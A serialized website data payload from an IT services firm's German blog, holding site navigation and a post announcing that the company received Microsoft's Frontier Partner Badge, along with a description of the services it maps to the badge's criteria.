[{"data":1,"prerenderedAt":21274},["ShallowReactive",2],{"global-header":3,"global-footer":759,"post-de--posts-2026-06-26-frontier-partner-1ef724e3808a69":797,"authors_data":967,"content-de-list-a91ba9a39090a":1313},{"lang":4,"home":5,"navigation":21,"meta":744,"contact":752},"de",{"folderSwitch":6,"name":9,"imgLight":10,"img":11,"languages":12},[7,8],"authors","blog","home","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"de":13,"en":17,"es":19},{"title":14,"url":15,"alias":15,"alt":16},"Home","/de","glueckkanja Logo",{"title":14,"url":18,"alt":16},"/en",{"title":14,"url":20,"alt":16},"/es",[22,195,367,493,598,611],{"name":23,"languages":24,"children":32},"workplace",{"de":25,"en":28,"es":30},{"title":26,"description":27},"Workplace","Microsoft 365-Power für smarte, sichere und flexible Arbeitswelten, die modernste Technologien und Identity Lösungen verbinden.",{"title":26,"description":29},"Microsoft 365-powered for smart, secure, and flexible workspaces, seamlessly integrating cutting-edge technologies and identity services.",{"title":26,"description":31},"Potenciado por Microsoft 365 para espacios de trabajo inteligentes, seguros y flexibles, integrando a la perfección tecnologías de vanguardia y servicios de identidad (en ingles).",[33,81,137],{"name":34,"languages":35,"children":40},"portfolio",{"de":36,"en":38,"es":39},{"title":37},"Portfolio",{"title":37},{"title":37},[41,51,61,71],{"name":42,"languages":43},"managed-intune",{"de":44,"en":47,"es":49},{"title":45,"url":46},"Managed Intune","/de/entra-intune/managed-intune",{"title":45,"url":48},"/en/entra-intune/managed-intune",{"title":45,"url":50},"/es/entra-intune/managed-intune",{"name":52,"languages":53},"managed-entra",{"de":54,"en":57,"es":59},{"title":55,"url":56},"Managed Entra","/de/entra-intune/managed-entra",{"title":55,"url":58},"/en/entra-intune/managed-entra",{"title":55,"url":60},"/es/entra-intune/managed-entra",{"name":62,"languages":63},"managed-workplace",{"de":64,"en":67,"es":69},{"title":65,"url":66},"Managed Workplace","/de/workplace/managed-workplace",{"title":65,"url":68},"/en/workplace/managed-workplace",{"title":65,"url":70},"/es/workplace/managed-workplace",{"name":72,"languages":73},"consulting-services",{"de":74,"en":77,"es":79},{"title":75,"url":76},"Consulting Services","/de/workplace/consulting-services",{"title":75,"url":78},"/en/workplace/consulting-services",{"title":75,"url":80},"/es/workplace/consulting-services",{"name":82,"languages":83,"children":88},"microsoft-365-endpoint",{"de":84,"en":86,"es":87},{"title":85},"Microsoft 365 Endpoint",{"title":85},{"title":85},[89,99,109,119,127],{"name":90,"languages":91},"microsoft-entra-suite",{"de":92,"en":95,"es":97},{"title":93,"url":94},"Microsoft Entra Suite","/de/workplace/microsoft-entra-suite",{"title":93,"url":96},"/en/workplace/microsoft-entra-suite",{"title":93,"url":98},"/es/workplace/microsoft-entra-suite",{"name":100,"languages":101},"microsoft-intune",{"de":102,"en":105,"es":107},{"title":103,"url":104},"Microsoft Intune","/de/workplace/microsoft-intune",{"title":103,"url":106},"/en/workplace/microsoft-intune",{"title":103,"url":108},"/es/workplace/microsoft-intune",{"name":110,"languages":111},"microsoft-windows",{"de":112,"en":115,"es":117},{"title":113,"url":114},"Microsoft Windows","/de/workplace/microsoft-windows",{"title":113,"url":116},"/en/workplace/microsoft-windows",{"title":113,"url":118},"/es/workplace/microsoft-windows",{"name":120,"languages":121},"windows-365-cloud-pc",{"en":122,"es":125},{"title":123,"url":124},"Windows 365 Cloud PC","/en/workplace/windows365-cloud-pc",{"title":123,"url":126},"/es/workplace/windows365-cloud-pc",{"name":128,"languages":129},"cloud-workplace-foundation",{"de":130,"en":133,"es":135},{"title":131,"url":132},"Cloud Workplace Foundation","/de/workplace/cloud-workplace-foundation",{"title":131,"url":134},"/en/workplace/cloud-workplace-foundation",{"title":131,"url":136},"/es/workplace/cloud-workplace-foundation",{"name":138,"languages":139,"children":144},"microsoft-365-collaboration",{"de":140,"en":142,"es":143},{"title":141},"Microsoft 365 Collaboration",{"title":141},{"title":141},[145,155,165,175,185],{"name":146,"languages":147},"microsoft-copilot",{"de":148,"en":151,"es":153},{"title":149,"url":150},"Microsoft 365 Copilot","/de/workplace/microsoft-365-copilot",{"title":149,"url":152},"/en/workplace/microsoft-365-copilot",{"title":149,"url":154},"/es/workplace/microsoft-365-copilot",{"name":156,"languages":157},"microsoft-teams",{"de":158,"en":161,"es":163},{"title":159,"url":160},"Teams","/de/workplace/microsoft-teams",{"title":159,"url":162},"/en/workplace/microsoft-teams",{"title":159,"url":164},"/es/workplace/microsoft-teams",{"name":166,"languages":167},"sharepoint-powerplatform",{"de":168,"en":171,"es":173},{"title":169,"url":170},"SharePoint & Power Platform","/de/workplace/sharepoint-power-platform",{"title":169,"url":172},"/en/workplace/sharepoint-power-platform",{"title":169,"url":174},"/es/workplace/sharepoint-power-platform",{"name":176,"languages":177},"exchange-online",{"de":178,"en":181,"es":183},{"title":179,"url":180},"Exchange Online","/de/workplace/exchange-online",{"title":179,"url":182},"/en/workplace/exchange-online",{"title":179,"url":184},"/es/workplace/exchange-online",{"name":186,"languages":187},"information-protection-compliance",{"de":188,"en":191,"es":193},{"title":189,"url":190},"Information Protection & Compliance","/de/workplace/information-protection-compliance",{"title":189,"url":192},"/en/workplace/information-protection-compliance",{"title":189,"url":194},"/es/workplace/information-protection-compliance",{"name":196,"languages":197,"children":205},"azure",{"de":198,"en":201,"es":203},{"title":199,"description":200},"Azure","Mit Azure Wachstum beflügeln: Cloud-Kosten senken, Effizienz steigern und Innovationen durch IaaS und PaaS vorantreiben.",{"title":199,"description":202},"Fuel growth with Azure: Cut cloud costs, boost efficiency, and drive innovation through IaaS and PaaS.",{"title":199,"description":204},"Impulse el crecimiento con Azure: Reduzca los costes de la nube, aumente la eficiencia e impulse la innovación a través de IaaS y PaaS (en ingles).",[206,233,287],{"name":207,"languages":208,"children":212},"azure-portfolio",{"de":209,"en":210,"es":211},{"title":37},{"title":37},{"title":37},[213,223],{"name":214,"languages":215},"azure-managed-services",{"de":216,"en":219,"es":221},{"title":217,"url":218},"Azure Managed Services","/de/azure/azure-managed-services",{"title":217,"url":220},"/en/azure/azure-managed-services",{"title":217,"url":222},"/es/azure/azure-managed-services",{"name":224,"languages":225},"azure-consulting",{"de":226,"en":229,"es":231},{"title":227,"url":228},"Azure Consulting","/de/azure/azure-consulting",{"title":227,"url":230},"/en/azure/azure-consulting",{"title":227,"url":232},"/es/azure/azure-consulting",{"name":234,"languages":235,"children":241},"azure-scenarios",{"de":236,"en":238,"es":240},{"title":237},"Szenarios",{"title":239},"Scenarios",{"title":239},[242,253,264,275],{"name":243,"languages":244},"plan-your-cloud",{"de":245,"en":248,"es":251},{"title":246,"url":247},"Planen Sie Ihre Cloud","/de/azure/plan-your-cloud",{"title":249,"url":250},"Plan your Cloud","/en/azure/plan-your-cloud",{"title":249,"url":252},"/es/azure/plan-your-cloud",{"name":254,"languages":255},"migrate-to-the-cloud",{"de":256,"en":259,"es":262},{"title":257,"url":258},"Migriere deine Cloud","/de/azure/migrate-to-the-cloud",{"title":260,"url":261},"Migrate to the cloud","/en/azure/migrate-to-the-cloud",{"title":260,"url":263},"/es/azure/migrate-to-the-cloud",{"name":265,"languages":266},"innovate-your-business",{"de":267,"en":270,"es":273},{"title":268,"url":269},"Erneuere dein Business","/de/azure/innovate-your-business",{"title":271,"url":272},"Innovate your business","/en/azure/innovate-your-business",{"title":271,"url":274},"/es/azure/innovate-your-business",{"name":276,"languages":277},"vmware-exit",{"de":278,"en":281,"es":284},{"title":279,"url":280},"Überdenke deine VMware-Strategie","/de/azure/vmware-exit",{"title":282,"url":283},"Rethink your VMware strategy","/en/azure/vmware-exit",{"title":285,"url":286},"Replantea tu estrategia de VMware","/es/azure/vmware-exit",{"name":288,"languages":289,"children":294},"azure-practices",{"de":290,"en":292,"es":293},{"title":291},"Practices",{"title":291},{"title":291},[295,305,313,318,328,337,347,357],{"name":296,"languages":297},"azure-foundation",{"de":298,"en":301,"es":303},{"title":299,"url":300},"Azure Foundation","/de/azure/azure-foundation",{"title":299,"url":302},"/en/azure/azure-foundation",{"title":299,"url":304},"/es/azure/azure-foundation",{"name":306,"languages":307},"avd-foundation",{"en":308,"es":311},{"title":309,"url":310},"AVD Foundation","/en/azure/avd-foundation",{"title":309,"url":312},"/es/azure/avd-foundation",{"name":128,"languages":314},{"de":315,"en":316,"es":317},{"title":131,"url":132},{"title":131,"url":134},{"title":131,"url":136},{"name":319,"languages":320},"azure-data-foundation",{"de":321,"en":324,"es":326},{"title":322,"url":323},"Azure Data Foundation","/de/azure/azure-data-foundation",{"title":322,"url":325},"/en/azure/azure-data-foundation",{"title":322,"url":327},"/es/azure/azure-data-foundation",{"name":296,"languages":329},{"de":330,"en":333,"es":335},{"title":331,"url":332},"Azure Container Foundation","/de/azure/azure-container-foundation",{"title":331,"url":334},"/en/azure/azure-container-foundation",{"title":331,"url":336},"/es/azure/azure-container-foundation",{"name":338,"languages":339},"dark-tenant",{"de":340,"en":343,"es":345},{"title":341,"url":342},"Dark Tenant","/de/azure/dark-tenant",{"title":341,"url":344},"/en/azure/dark-tenant",{"title":341,"url":346},"/es/azure/dark-tenant",{"name":348,"languages":349},"azure-cloud-adoption-framework",{"de":350,"en":353,"es":355},{"title":351,"url":352},"Cloud Adoption Framework","/de/azure/cloud-adoption-framework",{"title":351,"url":354},"/en/azure/cloud-adoption-framework",{"title":351,"url":356},"/es/azure/cloud-adoption-framework",{"name":358,"languages":359},"azure-cloud-competence-center",{"de":360,"en":363,"es":365},{"title":361,"url":362},"Cloud Competence Center","/de/azure/cloud-competence-center",{"title":361,"url":364},"/en/azure/cloud-competence-center",{"title":361,"url":366},"/es/azure/cloud-competence-center",{"name":368,"languages":369,"children":386},"security",{"de":370,"en":378,"es":382},{"title":371,"description":372,"emergency":373},"Security","Wachsamkeit in der Cloud mit einem preisgekrönten 24/7 Managed Service, Incident Response und modernstem Schutz für Ihre Infrastruktur.",{"text":374,"href":375,"skin":376,"icon":377},"Under Attack?","/de/security/are-you-under-attack","primary","emergency",{"title":371,"description":379,"emergency":380},"Vigilance in the cloud with an award-winning 24/7 managed service, incident response and state-of-the-art protection for your infrastructure.",{"text":374,"href":381,"skin":376,"icon":377},"/en/security/are-you-under-attack",{"title":371,"description":383,"emergency":384},"Vigilancia en la nube con un galardonado servicio gestionado 24/7, respuesta ante incidentes y protección de vanguardia para su infraestructura (en ingles).",{"text":374,"href":385,"skin":376,"icon":377},"/es/security/are-you-under-attack",[387,415,448],{"name":388,"children":389},"security-security-consulting",[390,400,405],{"name":391,"languages":392},"managed-red-tenant",{"de":393,"en":396,"es":398},{"title":394,"url":395},"Managed Red Tenant","/de/security/managed-red-tenant",{"title":394,"url":397},"/en/security/managed-red-tenant",{"title":394,"url":399},"/es/security/managed-red-tenant",{"name":338,"languages":401},{"de":402,"en":403,"es":404},{"title":341,"url":342},{"title":341,"url":344},{"title":341,"url":346},{"name":406,"languages":407},"security-consulting",{"de":408,"en":411,"es":413},{"title":409,"url":410},"Security Consulting","/de/security/security-consulting",{"title":409,"url":412},"/en/security/security-consulting",{"title":409,"url":414},"/es/security/security-consulting",{"name":416,"children":417},"security-cloud-security-operations-center",[418,428,438],{"name":419,"languages":420},"cloud-security-operations-center",{"de":421,"en":424,"es":426},{"title":422,"url":423},"Cloud Security Operations Center","/de/security/cloud-security-operations-center",{"title":422,"url":425},"/en/security/cloud-security-operations-center",{"title":422,"url":427},"/es/security/cloud-security-operations-center",{"name":429,"languages":430},"global-secure-access",{"de":431,"en":434,"es":436},{"title":432,"url":433},"Global Secure Access","/de/security/global-secure-access",{"title":432,"url":435},"/en/security/global-secure-access",{"title":432,"url":437},"/es/security/global-secure-access",{"name":439,"languages":440},"my-work-id",{"de":441,"en":444,"es":446},{"title":442,"url":443},"MyWorkID","/de/security/my-work-id",{"title":442,"url":445},"/en/security/my-work-id",{"title":442,"url":447},"/es/security/my-work-id",{"name":449,"children":450},"security-preventive-services",[451,461,471,481],{"name":452,"languages":453},"preventive-services",{"de":454,"en":457,"es":459},{"title":455,"url":456},"Preventive Services","/de/security/preventive-services",{"title":455,"url":458},"/en/security/preventive-services",{"title":455,"url":460},"/es/security/preventive-services",{"name":462,"languages":463},"data-security-services",{"de":464,"en":467,"es":469},{"title":465,"url":466},"Data Security Service","/de/security/data-security-service",{"title":465,"url":468},"/en/security/data-security-service",{"title":465,"url":470},"/es/security/data-security-service",{"name":472,"languages":473},"security-copilot-agents",{"de":474,"en":477,"es":479},{"title":475,"url":476},"Security Copilot Agents","/de/security/security-copilot-agents",{"title":475,"url":478},"/en/security/security-copilot-agents",{"title":475,"url":480},"/es/security/security-copilot-agents",{"name":482,"languages":483},"nis2",{"de":484,"en":487,"es":490},{"title":485,"url":486},"NIS2 technisch umsetzen","/de/security/red-dark-tenant-nis2",{"title":488,"url":489},"Implementing NIS2","/en/security/red-dark-tenant-nis2",{"title":491,"url":492},"Implementación técnica de NIS2","/es/security/red-dark-tenant-nis2",{"name":494,"languages":495,"children":505},"products",{"de":496,"en":499,"es":502},{"title":497,"description":498},"Produkte","Innovative Companion-Produkte für eine vollständig sichere, 100% cloud-native Microsoft-Umgebung, die Zusammenarbeit, Netzwerkauthentifizierung und Softwareverwaltung verbessern.",{"title":500,"description":501},"Products","Innovative companion products for a completely secure, 100% cloud-native Microsoft environment that enhance collaboration, network authentication and software management.",{"title":503,"description":504},"Productos","Innovadores productos complementarios para un entorno Microsoft completamente seguro y 100% nativo de la nube que mejoran la colaboración, la autenticación en red y la gestión del software (en ingles).",[506,559],{"name":507,"products":508,"children":509},"lorem ipsum 1",true,[510,523,535,547],{"name":511,"img":512,"target":513,"languages":514},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"de":515,"en":519,"es":521},{"title":516,"subtitle":517,"url":518},"RealmJoin","Cloudbasierte Softwareverteilung","https://www.realmjoin.com",{"title":516,"subtitle":520,"url":518},"Cloudbased Software distribution",{"title":516,"subtitle":522,"url":518},"Distribución de software en la nube",{"name":524,"img":525,"target":513,"languages":526},"scepman","products/scepman/scepman-nav-logo.svg",{"de":527,"en":531,"es":533},{"title":528,"subtitle":529,"url":530},"SCEPman","Zertifikatsverteilung aus der Cloud","https://www.scepman.com",{"title":528,"subtitle":532,"url":530},"Certificate distribution from the cloud",{"title":528,"subtitle":534,"url":530},"Distribución de certificados desde la nube",{"name":536,"img":537,"target":513,"languages":538},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"de":539,"en":543,"es":545},{"title":540,"subtitle":541,"url":542},"KONNEKT","Arbeiten Sie lokal mit Ihren Office 365-Daten","https://www.konnekt.io",{"title":540,"subtitle":544,"url":542},"Work with your local office 365 data",{"title":540,"subtitle":546,"url":542},"Trabaje con sus datos locales de office 365",{"name":548,"img":549,"target":513,"languages":550},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"de":551,"en":555,"es":557},{"title":552,"subtitle":553,"url":554},"RealMigrator","Migrieren Sie alle Ihre Datenressourcen","https://www.realmigrator.com",{"title":552,"subtitle":556,"url":554},"Migrate your data from one server to another",{"title":552,"subtitle":558,"url":554},"Migre sus datos de un servidor a otro",{"name":560,"products":508,"children":561},"lorem ipsum 2",[562,574,586],{"name":563,"img":564,"target":513,"languages":565},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"de":566,"en":570,"es":572},{"title":567,"subtitle":568,"url":569},"TerraProvider","Terraform Provider für Microsoft 365","https://www.terraprovider.com",{"title":567,"subtitle":571,"url":569},"Terraform Provider for Microsoft 365",{"title":567,"subtitle":573,"url":569},"Terraform Provider para Microsoft 365",{"name":575,"img":576,"target":513,"languages":577},"radiusaas","products/radius/radius-nav-logo.svg",{"de":578,"en":582,"es":584},{"title":579,"subtitle":580,"url":581},"RADIUSaaS","Authentifizierung für Ihr Netzwerk","https://www.radius-as-a-service.com",{"title":579,"subtitle":583,"url":581},"Authentication for your network",{"title":579,"subtitle":585,"url":581},"Autenticación para su red",{"name":587,"img":588,"target":513,"languages":589},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"de":590,"en":594,"es":596},{"title":591,"subtitle":592,"url":593},"Unified Contacts","Finden Sie alle Ihre Kontakte in Microsoft Teams","https://www.unified-contacts.com",{"title":591,"subtitle":595,"url":593},"Find contacts in Microsoft Teams",{"title":591,"subtitle":597,"url":593},"Buscar contactos en Microsoft Teams",{"name":599,"languages":600},"casestudies",{"de":601,"en":605,"es":608},{"title":602,"description":603,"url":604},"Case Studies","Pionier in der Cloud: Ihr Top-Microsoft-Partner für umfassende Cloud-Lösungen mit einem Blueprint-basierten Ansatz und Infrastructure-as-Code-Expertise.","/de/casestudies",{"title":602,"description":606,"url":607},"Pioneer in the Cloud: Your top Microsoft partner for comprehensive cloud solutions with a Blueprint-based approach and Infrastructure-as-Code expertise.","/en/casestudies",{"title":602,"description":609,"url":610},"Pionero en la Cloud: Su principal socio de Microsoft para soluciones integrales en la nube con un enfoque basado en Blueprint y experiencia en infraestructura como código (en ingles).","/es/casestudies",{"name":612,"languages":613,"children":620},"company",{"de":614,"en":616,"es":618},{"title":615,"description":603},"Unternehmen",{"title":617,"description":606},"Company",{"title":619,"description":609},"Empresa",[621,677,714],{"name":622,"languages":623,"children":630},"company-about-us",{"de":624,"en":626,"es":628},{"title":625},"Über Uns",{"title":627},"About us",{"title":629},"Acerca de nosotros",[631,642,654,666],{"name":632,"languages":633},"company-facts-figures",{"de":634,"en":637,"es":639},{"title":635,"url":636},"Facts & Figures","/de/company/facts-and-figures",{"title":635,"url":638},"/en/company/facts-and-figures",{"title":640,"url":641},"Datos y cifras","/es/company/facts-and-figures",{"name":643,"languages":644},"company-contact",{"de":645,"en":648,"es":651},{"title":646,"url":647},"Kontakt & Standorte","/de/company/contact-and-locations",{"title":649,"url":650},"Contact & Locations","/en/company/contact-and-locations",{"title":652,"url":653},"Contacto y ubicaciones","/es/company/contact-and-locations",{"name":655,"languages":656},"switzerland",{"de":657,"en":660,"es":663},{"title":658,"url":659},"glueckkanja Schweiz","/de/company/switzerland",{"title":661,"url":662}," glueckkanja Switzerland","/en/company/switzerland",{"title":664,"url":665},"glueckkanja Suiza","/es/company/switzerland",{"name":667,"languages":668},"austria",{"de":669,"en":672,"es":675},{"title":670,"url":671},"glueckkanja Österreich","/de/company/austria",{"title":673,"url":674},"glueckkanja Austria","/en/company/austria",{"title":673,"url":676},"/es/company/austria",{"name":678,"languages":679,"children":686},"company-career",{"de":680,"en":682,"es":684},{"title":681},"Karriere",{"title":683},"Career",{"title":685},"Carreras",[687,699,705],{"name":688,"languages":689},"company-career-overview",{"de":690,"en":693,"es":696},{"title":691,"url":692},"Karriere Übersicht","/de/career",{"title":694,"url":695},"Career overview","/en/career",{"title":697,"url":698},"Carrera general","/es/career",{"name":700,"languages":701},"company-young-professionals",{"de":702},{"title":703,"url":704},"Young Professionals","/de/young-professionals",{"name":706,"languages":707},"company-jobs",{"de":708,"en":711},{"title":709,"url":710},"Stellenanzeigen","/de/job-offers",{"title":712,"url":713},"Job offers","/en/job-offers",{"name":715,"languages":716,"children":723},"company-latest",{"de":717,"en":719,"es":721},{"title":718},"Aktuelles",{"title":720},"Latest",{"title":722},"Últimas novedades",[724,734],{"name":725,"languages":726},"company-blog",{"de":727,"en":730,"es":732},{"title":728,"url":729},"Blog","/de/blog",{"title":728,"url":731},"/en/blog",{"title":728,"url":733},"/es/blog",{"name":725,"languages":735},{"de":736,"en":739,"es":741},{"title":737,"url":738},"Events","/de/events",{"title":737,"url":740},"/en/events",{"title":742,"url":743},"Eventos","/es/events",[745],{"name":746,"languages":747},"career-meta",{"de":748,"en":750,"es":751},{"title":681,"url":692,"active":749},false,{"title":683,"url":695,"active":749},{"title":683,"url":698,"active":749},{"languages":753},{"de":754,"en":756,"es":758},{"title":755,"url":647,"active":749},"Kontakt",{"title":757,"url":650,"active":749},"Contact",{"title":757,"url":653,"active":749},{"data":760},{"bgColor":761,"number":762,"mail":763,"brandLogos":764,"logos":765,"links":769,"linksEn":779,"linksEs":788},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[766],{"img":10,"alt":16,"url":767,"class":768},"index.html","max-w-19rem",[770,773,776],{"title":771,"url":772},"Datenschutz","/de/privacy",{"title":774,"url":775},"Impressum","/de/imprint",{"title":777,"url":778},"No Cookies","/de/cookies",[780,783,786],{"title":781,"url":782},"Privacy","/en/privacy",{"title":784,"url":785},"Imprint","/en/imprint",{"title":777,"url":787},"/en/cookies",[789,791,794],{"title":790,"url":782},"Privacidad",{"title":792,"url":793},"Imprimir","/es/imprint",{"title":795,"url":796},"Sin Cookies","/es/cookies",{"id":798,"title":799,"author":800,"body":802,"cta":764,"description":808,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":871,"moment":874,"navigation":508,"path":959,"seo":960,"stem":961,"tags":962,"webcast":749,"__hash__":966},"content_de/posts/2026-06-26-frontier-partner.md","Microsoft Frontier Partner: wir gehören dazu",[801],"Carolin Kanja",{"type":803,"value":804,"toc":862},"minimal",[805,809,814,817,820,824,826,829,850,853,857,859],[806,807,808],"p",{},"Im Microsoft-Partner-Ökosystem gibt es eine ganze Reihe von Anerkennungen, und doch hebt sich das Frontier Partner Badge in seiner Anlage von den anderen Auszeichnungen ab. Es lässt sich nicht beantragen, sondern wird auf Initiative von Microsoft an einen exklusiven Kreis von Partnern vergeben, die in mehreren Disziplinen parallel überzeugen müssen, statt in einer einzelnen zu glänzen. Microsoft prüft dabei nachgewiesene Kompetenz in Cloud & AI Platforms, in AI Business Solutions und in Security gleichermaßen und adressiert damit Unternehmen, die KI nicht als Aufsatz auf bestehende IT verstehen, sondern als Ergebnis einer durchgängigen Architektur, die von der Identität über den Endpoint bis in den produktiven KI-Betrieb trägt.",[810,811,813],"h2",{"id":812},"was-microsoft-mit-dem-badge-prüft","Was Microsoft mit dem Badge prüft",[806,815,816],{},"{: .h3-font-size}",[806,818,819],{},"Microsoft prüft beim Frontier Partner Badge nicht eine Disziplin allein, sondern eine Kette, in der sich Cloud-Plattform, KI-Anwendung und Security gegenseitig bedingen. Die Cloud-Plattform und die KI-Infrastruktur müssen tragfähig genug sein, damit produktive KI-Anwendungen darauf laufen können, und diese Anwendungen wiederum müssen den Übergang aus dem Pilot in den Regelbetrieb tatsächlich vollziehen, nicht nur in der Demo überzeugen. Die Absicherung dieser Umgebung gegen reale Angriffe steht in beiden Disziplinen quer im Raum und entscheidet darüber, ob aus einem KI-Vorhaben am Ende produktive Wertschöpfung wird oder ein Sicherheitsrisiko, das in regulierten Branchen nicht tragbar ist. Daten- und Identitäts-Architektur sind in diesem Modell keine separaten Themen, sondern Teil jeder dieser Disziplinen, und genau an dieser Stelle scheitern die meisten KI-Vorhaben in Unternehmen, wenn die Foundation darunter nicht trägt.",[810,821,823],{"id":822},"worauf-das-badge-bei-uns-aufsetzt","Worauf das Badge bei uns aufsetzt",[806,825,816],{},[806,827,828],{},"Wir bauen seit Jahren in der Reihenfolge, in der Microsoft prüft: zunächst die Foundation, auf der alles ruht, dann die Workloads, die darauf laufen, und schließlich die Intelligenz, die in diese Workloads einzieht. Jeder Bereich, den Microsoft beim Frontier Partner Badge betrachtet, mappt auf einen unserer Services, der in produktiven Kundenumgebungen läuft und damit nicht im Konzeptpapier, sondern im Tagesbetrieb verifiziert ist.",[806,830,831,832,835,836,838,839,835,841,843,844,846,847,849],{},"Im Arbeitsplatz halten die ",[833,834,131],"a",{"href":132}," und ",[833,837,45],{"href":46}," Windows 365, Azure Virtual Desktop und klassische Endgeräte unter einer gemeinsamen Logik zusammen, und darunter sorgt eine versionskontrollierte Intune-Umgebung dafür, dass jede Richtlinie als Code gepflegt wird und Drift-Erkennung anschlägt, bevor eine Konfigurationsabweichung ausnutzbar wird. Auf der Cloud-Plattform liefern die ",[833,840,299],{"href":300},[833,842,322],{"href":323}," eine Landing Zone und eine Lakehouse-Architektur, die KI-Anwendungen mit konsistenten Daten versorgen und die Trennung von Plattform- und Anwendungsebene konsequent durchziehen. Auf der Security-Ebene sorgen der ",[833,845,394],{"href":395}," und unser Cloud Security Operations Center für einen vollständig getrennten administrativen Kontext, für Privileged Access Workstations und für einen rund um die Uhr überwachten SOC-Betrieb, der in Defender und Sentinel Angriffe nicht erst dann sieht, wenn sie schon Wirkung entfaltet haben. Und in der KI-Anwendung rekonstruieren die ",[833,848,475],{"href":476}," Incidents in Defender XDR, reichern sie mit Bedrohungsdaten an und übernehmen damit Triage-Arbeit, die heute Stunden im SOC bindet.",[806,851,852],{},"Genau diese durchgängige Kette, vom Arbeitsplatz bis in die produktive KI-Anwendung, ist die Substanz, die Microsoft mit dem Frontier Partner Badge bestätigt.",[810,854,856],{"id":855},"was-das-badge-für-kundenprojekte-bedeutet","Was das Badge für Kundenprojekte bedeutet",[806,858,816],{},[806,860,861],{},"Für ein Unternehmen, das überlegt, mit welchem Partner es seine ersten produktiven KI-Projekte aufsetzt, ist das Frontier Partner Badge eine Abkürzung im Auswahlprozess, weil das Siegel von Microsoft direkt vergeben wird und damit signalisiert, dass diese Gruppe KI-Projekte in regulierten, security-sensiblen Umgebungen zu Ende bringen kann. In der Praxis verschiebt das die Gespräche zwischen Partner, Kunde und Microsoft auf eine andere Ebene, weil Frontier Partner näher an Microsofts Roadmap sitzen und für Pilotprogramme und frühe Releases direkt adressiert werden, während Microsoft-Account-Teams sie für Co-Engagements heranziehen, wenn ein Kunde bei einem KI-Vorhaben technische Tragfähigkeit braucht. Zugleich stehen die ausgezeichneten Partner unter dauerhaftem Nachweisdruck, denn wer in diesem Jahr qualifiziert ist, muss es im nächsten Jahr wieder sein, und der Anforderungskatalog selbst verschiebt sich von Jahr zu Jahr. Bestandsschutz gibt es nicht.",{"title":863,"searchDepth":864,"depth":864,"links":865},"",2,[866,867,868],{"id":812,"depth":864,"text":813},{"id":822,"depth":864,"text":823},{"id":855,"depth":864,"text":856},"md","post",{"lang":4,"seoTitle":872,"titleClass":873,"date":874,"categories":875,"blogtitlepic":877,"socialimg":878,"customExcerpt":879,"keywords":880,"contactInContent":881,"hreflang":951,"published":508,"scripts":958},"Microsoft Frontier Partner Badge: glueckkanja qualifiziert","h2-font-size","2026-06-26",[876],"Corporate","head-frontier-partner-badge.jpg","/blog/heads/head-frontier-partner-badge.jpg","Seit kurzem gibt es im Microsoft AI Cloud Partner Program eine neue Spitzenauszeichnung, das Frontier Partner Badge. Microsoft verleiht es ausschließlich an einen exklusiven Kreis von Partnern weltweit, die KI-Projekte auf dem gesamten Microsoft-Stack tragfähig liefern, vom Arbeitsplatz über die Cloud-Plattform und Security bis in die KI-Anwendung selbst, und diesen Anspruch in der Praxis nachgewiesen haben. Im DACH-Raum zählt diese Gruppe nur eine Handvoll Unternehmen, und wir sind eines davon.","Frontier Partner, Microsoft Frontier Partner Badge, Microsoft AI Cloud Partner Program, Solutions Partner Designation, Specialization Copilot, Specialization AI Apps, Specialization Data Security, Microsoft Partner Deutschland, Microsoft AI Solutions Partner, glueckkanja Microsoft Partner, Copilot Solutions Partner, Modern Work, Security Solutions Partner, Microsoft Partner Center",{"quote":508,"infos":882},{"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":885,"subline":886,"level":810,"textStyling":887,"flush":888,"person":889,"form":904},"var(--color-gk-dark-blue)","var(--color-gk-white)","Jetzt Kontakt aufnehmen","Ihr plant KI-Vorhaben im Microsoft-Stack und wollt wissen, was das Frontier-Badge in der Praxis für eure Umgebung bedeutet? Sprecht uns an, wir gehen mit euch durch, wo ihr heute steht und was sinnvoll als Nächstes kommt.","text-light","justify-content-end",{"image":890,"cloudinary":508,"alt":891,"name":892,"quotee":892,"quoteeTitle":893,"quote":894,"detailsHeader":895,"details":896},"/people/at-andreas-hoetzinger.png","Andreas Hötzinger, Head of Partner Alliances","Andreas Hötzinger","Head of Partner Alliances","Microsoft hat die Latte mit dem Frontier Partner Badge bewusst hoch gelegt. Wer durchgeht, hat in mehreren Disziplinen geliefert, nicht in einer. Für Kunden ist das im Auswahlprozess die kürzeste Antwort auf die Frage, wer KI im Microsoft-Stack tragfähig macht.","Wir freuen uns darauf,\u003Cbr />von euch zu hören!",[897,901],{"text":762,"href":898,"details":899,"icon":900},"tel:+49 69 4005520","Jetzt anrufen","site/phone",{"text":763,"href":902,"icon":903},"mailto:info@glueckkanja.com","site/mail",{"ctaText":905,"cta":906,"method":870,"action":908,"fields":909},"Absenden",{"skin":907},"primary on-surface","/send",[910,914,919,922,926,931,936,938,941,944,947,949],{"type":911,"id":912,"value":913},"hidden","_next","successful",{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},"Name*","text","name","Bitte gib deinen Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},"Unternehmen*","Bitte gib dein Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},"E-Mail-Adresse*","email","Bitte gib deine E-Mail-Adresse ein.",{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},"Deine Nachricht an uns","textarea","message","Bitte gib eine Nachricht ein.",{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden gespeichert und zur Bearbeitung deiner Anfrage verwendet. Details findest du in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.","checkbox","dataprotection","Bitte bestätigen",{"type":911,"id":937,"value":876},"_topic",{"type":911,"id":939,"value":940},"_location","World",{"type":911,"id":942,"value":943},"_subject","Form: Frontier Partner | 